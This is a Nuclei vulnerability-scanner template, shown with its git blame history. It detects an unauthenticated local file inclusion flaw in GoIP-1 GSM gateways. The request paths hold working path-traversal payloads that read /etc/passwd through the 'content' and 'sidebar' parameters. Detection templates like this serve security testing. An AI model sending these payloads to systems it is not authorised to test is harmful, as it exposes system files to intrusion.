nuclei-templates/vulnerabilities/other/goip-1-lfi.yaml

id: goip-1-lfi

info:
  name: GoIP-1 GSM - Local File Inclusion
  author: gy741
  severity: high
  description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker
    to read arbitrary files on the affected system.
  reference:
    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
    - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
    - http://en.dbltek.com/latestfirmwares.html
  tags: gsm,goip,lfi,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00			`id: goip-1-lfi`

			`info:`
			`name: GoIP-1 GSM - Local File Inclusion`
			`author: gy741`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker`
			`to read arbitrary files on the affected system.`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00			`reference:`
Update goip-1-lfi.yaml 2022-02-22 06:08:07 +00:00			`- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/`
			`- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf`
			`- http://en.dbltek.com/latestfirmwares.html`
payload fix 2022-02-25 11:58:47 +00:00			`tags: gsm,goip,lfi,iot`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00
			`requests:`
			`- method: GET`
			`path:`
payload fix 2022-02-25 11:58:47 +00:00			`- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"`
			`- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`